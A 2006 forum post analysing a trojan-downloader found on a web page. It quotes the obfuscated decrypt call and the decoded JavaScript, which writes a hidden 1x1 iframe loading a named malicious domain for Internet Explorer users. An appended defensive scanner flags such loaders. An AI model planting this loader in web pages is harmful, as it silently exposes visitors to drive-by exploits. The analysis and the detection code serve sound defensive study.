Old 12-11-2006, 02:43 PM  
jacked
sperm tail
Join Date: May 2004
Location: nj
Posts: 11,019
You've got scumware on that box.

HTML/TrojanDownloader.Agent.AU

do a search for

http://wsfgfdgrtyhgfd.net


Quote:
decrypt_p("rvBcveRszie7mhKLa_OIa_3vigdIhhAcqeO@Yic 786VExeJ7ienLF8OP4rdI9_3vMhKE3M3IpyKzMFwzYrdI9_AZo LKPolVI4yAE6_Kzyh3LHQmviUd@qenL6yKPp49sMiOP4r3Pp49 VJ4JLSeOP4e9QojJ7oSO@MiALFruzphwEk8OviqDLM_K7b6t7f yAIkQ3PMicUFeO@p_wQavmsQeRXu_b7Mh3LHQX7zhAPH8DLMiO I3r3P4et76enItbt@piJzeGuUF8cPaRwPaeJEwTAP_iKUM_wES FwPhytWFSBUfRKPay9@Mi3PJrtzO4c7oSO@fiJ@tb9Wi6t@H@A POiOviFX7odKzxQ3PiyKzf_KztbtWiD1vSLgVThdj2rB23jml1 GucveRszi0v")</script>

This is what is run when the page loads. This calls the decrypt
function and passes it this long string of "garbage".

The decrypt function decodes this into the following JavaScript program
and inserts it into the web page.

<SCRIPT language="JavaScript">
// Only fires for Internet Explorer; any other browser gets nothing.
var browserName=navigator.appName;
if (browserName=="Microsoft Internet Explorer") {
window.status="Done";
// Writes a 1x1, borderless iframe that silently loads the remote page.
document.write('<IFRAME name="PageContainer" src="http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php" width="1" height="1" frameborder="0"></IFRAME>');
}
</SCRIPT>

As you can see, the spyware targets only Microsoft Internet Explorer,
likely because it has some security flaw the site wants to exploit.
Basically a web page with the decrypt function will set up a small
iframe (1 pixel in size) and load the page at

http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php

Which is presently recorded as being owned by:
Domain Name: WSFGFDGRTYHGFD.NET
Registrar: ONLINENIC, INC.
Whois Server: whois.OnlineNIC.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS4.ASDBIZ.BIZ
Name Server: NS3.ASDBIZ.BIZ
Status: ACTIVE
EPP Status: ok
Updated Date: 15-Nov-2006
Creation Date: 12-Oct-2006
Expiration Date: 12-Oct-2007

The web server for this domain is presently down so what the iframe was
actually doing is an open question.

But yes, you can assume that the effort to purge the computer of
mal/adware was not 100% effective.
And more about it here:

http://www.aboutus.org/Wsfgfdgrtyhgfd.net
__________________
Got Cam Models?
icq: 361-607-616
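As an added example (not code from this post or from the quoted analysis), a small static scanner that flags the two indicators the decoded loader above shows: a decoder-style call whose only argument is one long opaque string, and a 1x1 or off-site iframe, including one emitted through document.write. The HTML it runs over is constructed; example.com is assumed as the page's own host, and the encoded string is a generated stand-in, not the post's string.

```javascript
// Constructed example, not code from the post: a static scanner for the two
// indicators the quoted analysis describes, run over made-up HTML.
const ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_@";
// Deterministic stand-in for the encoded payload (constructed, not the post's string).
function opaqueBlob(len, seed = 7) {
  let s = seed >>> 0, out = "";
  for (let i = 0; i < len; i++) {
    s = (Math.imul(s, 1103515245) + 12345) >>> 0;
    out += ALPHABET[(s >>> 16) % ALPHABET.length];
  }
  return out;
}
// Long, whitespace-free, many distinct characters: how an encoded loader string looks.
function isOpaqueLiteral(str) {
  return str.length >= 100 && !/\s/.test(str) && new Set(str).size >= 20;
}
// One attribute value out of a raw tag string (quoted or bare).
function attr(tag, name) {
  const m = tag.match(new RegExp("\\b" + name + "\\s*=\\s*[\"']?([^\"'\\s>]+)", "i"));
  return m ? m[1] : null;
}
function hostOf(url) { try { return new URL(url).host; } catch (e) { return null; } }
// Returns findings for a page served from pageHost.
function scanForDropper(html, pageHost) {
  const findings = [];
  // 1. a decoder-style call whose only argument is one long opaque literal
  for (const m of html.matchAll(/\b([A-Za-z_$][\w$]*)\s*\(\s*["']([^"']+)["']\s*\)/g)) {
    if (isOpaqueLiteral(m[2])) findings.push({ kind: "opaque-decoder-call", fn: m[1], length: m[2].length });
  }
  // 2. a 1x1 or off-site iframe, including one emitted through document.write
  for (const m of html.matchAll(/<iframe\b[^>]*>/gi)) {
    const tag = m[0], src = attr(tag, "src");
    if (!src) continue;
    const w = parseInt(attr(tag, "width") || "0", 10), h = parseInt(attr(tag, "height") || "0", 10);
    const tiny = (w > 0 && w <= 1) || (h > 0 && h <= 1);
    const external = hostOf(src) !== null && hostOf(src) !== pageHost;
    // was this tag sitting inside a document.write('...') string literal?
    const viaDocumentWrite = /document\.write\s*\(\s*['"][^'"]*$/.test(html.slice(Math.max(0, m.index - 60), m.index));
    if (tiny || external) findings.push({ kind: "hidden-iframe", src, tiny, external, viaDocumentWrite });
  }
  return findings;
}
// Constructed page: one benign same-host frame, then the loader pattern from the post.
const SAMPLE_HTML = [
  '<html><body><h1>Welcome</h1>',
  '<iframe src="https://example.com/help" width="300" height="200"></iframe>',
  '<script>decrypt_p("' + opaqueBlob(160) + '")</script>',
  '<script>if (navigator.appName == "Microsoft Internet Explorer") {',
  'document.write(\'<IFRAME name="PageContainer" src="http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php" width="1" height="1" frameborder="0"></IFRAME>\'); }</script>',
  '</body></html>',
].join("\n");
```

Running scanForDropper(SAMPLE_HTML, "example.com") reports one opaque-decoder-call (decrypt_p) and one hidden-iframe that is tiny, off-site and written via document.write; the 300x200 same-host frame is not flagged.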